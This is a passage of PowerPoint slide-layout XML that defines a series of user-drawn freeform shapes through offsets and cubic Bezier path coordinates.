              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6092"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Freeform 183"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6240"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Freeform 184"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="643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Freeform 185"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6634"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Freeform 186"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6781"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Freeform 187"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6978"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Freeform 188"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="712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Freeform 189"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7325"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Freeform 190"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7473" y="2564"/>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Freeform 191"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7671"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Freeform 192"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3461" y="255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2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4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="176"/>
                      <a:pt x="179" y="179"/>
                      <a:pt x="176" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="185"/>
                      <a:pt x="170" y="187"/>
                      <a:pt x="166" y="189"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="157" y="193"/>
                      <a:pt x="148" y="199"/>
                      <a:pt x="141" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="207"/>
                      <a:pt x="137" y="208"/>
                      <a:pt x="134" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="209"/>
                      <a:pt x="128" y="209"/>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2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="200"/>
                      <a:pt x="18" y="199"/>
                      <a:pt x="11" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="196"/>
                      <a:pt x="7" y="196"/>
                      <a:pt x="5" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="194"/>
                      <a:pt x="0" y="191"/>
                      <a:pt x="1" y="187"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="186"/>
                      <a:pt x="2" y="185"/>
                      <a:pt x="2" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="180"/>
                      <a:pt x="4" y="176"/>
                      <a:pt x="3" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="170"/>
                      <a:pt x="2" y="168"/>
                      <a:pt x="2" y="166"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="162"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="7" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="159"/>
                      <a:pt x="12" y="159"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="22" y="155"/>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79"/>
                      <a:pt x="6" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="185"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="5" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="4" y="191"/>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8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="169"/>
                      <a:pt x="49" y="160"/>
                      <a:pt x="42" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="149"/>
                      <a:pt x="37" y="147"/>
                      <a:pt x="35" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="143"/>
                      <a:pt x="30" y="142"/>
                      <a:pt x="27" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="145"/>
                      <a:pt x="25" y="145"/>
                      <a:pt x="25" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="140"/>
                      <a:pt x="24" y="137"/>
                      <a:pt x="25" y="133"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="132"/>
                      <a:pt x="26" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="124"/>
                      <a:pt x="33" y="118"/>
                      <a:pt x="35" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="106"/>
                      <a:pt x="39" y="99"/>
                      <a:pt x="43" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="90"/>
                      <a:pt x="49" y="87"/>
                      <a:pt x="52" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="80"/>
                      <a:pt x="56" y="76"/>
                      <a:pt x="58" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="70"/>
                      <a:pt x="60" y="68"/>
                      <a:pt x="60" y="64"/>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7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="23"/>
                      <a:pt x="122" y="29"/>
                      <a:pt x="122" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="40"/>
                      <a:pt x="122" y="43"/>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3" y="160"/>
                      <a:pt x="139" y="160"/>
                      <a:pt x="135" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="133" y="159"/>
                      <a:pt x="132" y="157"/>
                      <a:pt x="131" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="154"/>
                      <a:pt x="129" y="152"/>
                      <a:pt x="128" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="149"/>
                      <a:pt x="126" y="148"/>
                      <a:pt x="125" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="148"/>
                      <a:pt x="122" y="149"/>
                      <a:pt x="121" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="155"/>
                      <a:pt x="120" y="159"/>
                      <a:pt x="121" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="171"/>
                      <a:pt x="123" y="178"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="188"/>
                      <a:pt x="121" y="191"/>
                      <a:pt x="122" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="201"/>
                      <a:pt x="129" y="205"/>
                      <a:pt x="136" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="201"/>
                      <a:pt x="142" y="199"/>
                      <a:pt x="144" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="191"/>
                      <a:pt x="158" y="188"/>
                      <a:pt x="165" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="185"/>
                      <a:pt x="170" y="184"/>
                      <a:pt x="173" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="182"/>
                      <a:pt x="174" y="181"/>
                      <a:pt x="175" y="181"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="179"/>
                      <a:pt x="176" y="178"/>
                      <a:pt x="175" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="175"/>
                      <a:pt x="172" y="174"/>
                      <a:pt x="171" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="173"/>
                      <a:pt x="169" y="173"/>
                      <a:pt x="168" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="163" y="171"/>
                      <a:pt x="161" y="167"/>
                      <a:pt x="160" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="160"/>
                      <a:pt x="160" y="158"/>
                      <a:pt x="160" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="154"/>
                      <a:pt x="160" y="153"/>
                      <a:pt x="161" y="152"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="68"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="68"/>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="71"/>
                      <a:pt x="74" y="73"/>
                      <a:pt x="77" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="74"/>
                      <a:pt x="85" y="73"/>
                      <a:pt x="88" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="70"/>
                      <a:pt x="94" y="68"/>
                      <a:pt x="98" y="66"/>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79"/>
                      <a:pt x="81" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="82"/>
                      <a:pt x="76" y="82"/>
                      <a:pt x="73" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="77"/>
                      <a:pt x="69" y="74"/>
                      <a:pt x="67" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="71"/>
                      <a:pt x="66" y="70"/>
                      <a:pt x="65" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="70"/>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1"/>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="123"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="127"/>
                      <a:pt x="35" y="131"/>
                      <a:pt x="37"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5"/>
                      <a:pt x="67" y="176"/>
                      <a:pt x="64" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="177"/>
                      <a:pt x="63" y="177"/>
                      <a:pt x="62" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="179"/>
                      <a:pt x="65" y="181"/>
                      <a:pt x="66" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="186"/>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3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="173"/>
                      <a:pt x="115" y="172"/>
                      <a:pt x="115" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="172"/>
                      <a:pt x="116" y="174"/>
                      <a:pt x="117" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="178"/>
                      <a:pt x="117" y="182"/>
                      <a:pt x="115" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="188"/>
                      <a:pt x="114" y="190"/>
                      <a:pt x="114" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="113" y="194"/>
                      <a:pt x="114" y="195"/>
                      <a:pt x="116" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="191"/>
                      <a:pt x="118" y="186"/>
                      <a:pt x="119" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="178"/>
                      <a:pt x="120" y="175"/>
                      <a:pt x="119" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="167"/>
                      <a:pt x="118" y="163"/>
                      <a:pt x="118" y="159"/>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3"/>
                      <a:pt x="139" y="131"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="135"/>
                      <a:pt x="136" y="138"/>
                      <a:pt x="132" y="138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="138"/>
                      <a:pt x="128" y="137"/>
                      <a:pt x="128" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="132"/>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2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="70"/>
                      <a:pt x="105" y="67"/>
                      <a:pt x="106" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="62"/>
                      <a:pt x="106" y="60"/>
                      <a:pt x="107" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="56"/>
                      <a:pt x="106" y="54"/>
                      <a:pt x="104" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="52"/>
                      <a:pt x="97" y="51"/>
                      <a:pt x="94" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="48"/>
                      <a:pt x="91" y="47"/>
                      <a:pt x="91" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="43"/>
                      <a:pt x="91" y="41"/>
                      <a:pt x="92" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="93" y="37"/>
                      <a:pt x="95" y="36"/>
                      <a:pt x="98" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="37"/>
                      <a:pt x="101" y="38"/>
                      <a:pt x="102" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="42"/>
                      <a:pt x="103" y="45"/>
                      <a:pt x="102" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="48"/>
                      <a:pt x="101" y="49"/>
                      <a:pt x="102" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="51"/>
                      <a:pt x="107" y="50"/>
                      <a:pt x="107" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="44"/>
                      <a:pt x="107" y="39"/>
                      <a:pt x="105" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="31"/>
                      <a:pt x="100" y="29"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="30"/>
                      <a:pt x="88" y="33"/>
                      <a:pt x="87" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="39"/>
                      <a:pt x="87" y="40"/>
                      <a:pt x="87" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="43"/>
                      <a:pt x="87" y="45"/>
                      <a:pt x="87" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="45"/>
                      <a:pt x="83" y="45"/>
                      <a:pt x="81" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="46"/>
                      <a:pt x="80" y="46"/>
                      <a:pt x="80" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="46"/>
                      <a:pt x="78" y="45"/>
                      <a:pt x="78" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="41"/>
                      <a:pt x="77" y="38"/>
                      <a:pt x="76" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="35"/>
                      <a:pt x="76" y="35"/>
                      <a:pt x="76" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="32"/>
                      <a:pt x="73" y="31"/>
                      <a:pt x="70" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="31"/>
                      <a:pt x="67" y="32"/>
                      <a:pt x="66" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="39"/>
                      <a:pt x="63" y="45"/>
                      <a:pt x="66" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="50"/>
                      <a:pt x="67" y="51"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="69" y="50"/>
                      <a:pt x="69" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="48"/>
                      <a:pt x="68" y="48"/>
                      <a:pt x="67" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="45"/>
                      <a:pt x="65" y="42"/>
                      <a:pt x="66" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="37"/>
                      <a:pt x="71" y="36"/>
                      <a:pt x="73" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="39"/>
                      <a:pt x="75" y="42"/>
                      <a:pt x="75" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="46"/>
                      <a:pt x="74" y="47"/>
                      <a:pt x="73" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="48"/>
                      <a:pt x="72" y="48"/>
                      <a:pt x="72" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="51"/>
                      <a:pt x="69" y="52"/>
                      <a:pt x="66" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="54"/>
                      <a:pt x="65" y="55"/>
                      <a:pt x="64" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="58"/>
                      <a:pt x="64" y="59"/>
                      <a:pt x="65" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="60"/>
                      <a:pt x="67" y="61"/>
                      <a:pt x="68" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="66"/>
                      <a:pt x="74" y="66"/>
                      <a:pt x="78" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="66"/>
                      <a:pt x="87" y="65"/>
                      <a:pt x="91" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="62"/>
                      <a:pt x="98" y="61"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="103" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="58"/>
                      <a:pt x="103" y="59"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="60"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="102" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="63"/>
                      <a:pt x="91" y="65"/>
                      <a:pt x="86" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="69"/>
                      <a:pt x="79" y="69"/>
                      <a:pt x="74" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="69"/>
                      <a:pt x="72" y="68"/>
                      <a:pt x="71" y="68"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="43"/>
                      <a:pt x="73" y="41"/>
                      <a:pt x="72" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                      <a:pt x="70" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="40"/>
                      <a:pt x="70" y="41"/>
                      <a:pt x="70" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="41"/>
                      <a:pt x="72" y="42"/>
                      <a:pt x="72" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="44"/>
                      <a:pt x="72" y="45"/>
                      <a:pt x="73" y="45"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="97" y="39"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="40"/>
                      <a:pt x="99" y="42"/>
                      <a:pt x="100" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="43"/>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="42"/>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Freeform 193"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3551" y="2614"/>
                <a:ext cx="3" cy="2"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2 w 2"/>
                  <a:gd name="T1" fmla="*/ 0 h 2"/>
                  <a:gd name="T2" fmla="*/ 1 w 2"/>
                  <a:gd name="T3" fmla="*/ 1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1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="2"/>
                      <a:pt x="0" y="2"/>
                      <a:pt x="0" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="1"/>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Freeform 194"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3564" y="261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Freeform 195"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2004"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Freeform 196"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2152"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Freeform 197"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="23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Freeform 198"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2497"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Freeform 199"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2692"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Freeform 200"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2890"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Freeform 201"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3032" y="3298"/>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Freeform 202"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3140" y="3298"/>
                <a:ext cx="77"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3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9"/>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4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="44"/>
                      <a:pt x="22" y="44"/>
                      <a:pt x="22" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="27"/>
                      <a:pt x="15" y="18"/>
                      <a:pt x="0" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="0"/>
                      <a:pt x="42" y="14"/>
                      <a:pt x="42" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="83"/>
                      <a:pt x="42" y="83"/>
                      <a:pt x="42" y="83"/>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Freeform 203"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3248"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Freeform 204"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3395"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Freeform 205"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3590"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Freeform 206"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3788"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Freeform 207"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3938"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Freeform 208"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4085"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Freeform 209"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4284"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Freeform 210"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4433" y="3292"/>
                <a:ext cx="82"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Freeform 211"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4581"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Freeform 212"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4779"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Freeform 213"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4926"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Freeform 214"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5125"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Freeform 215"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
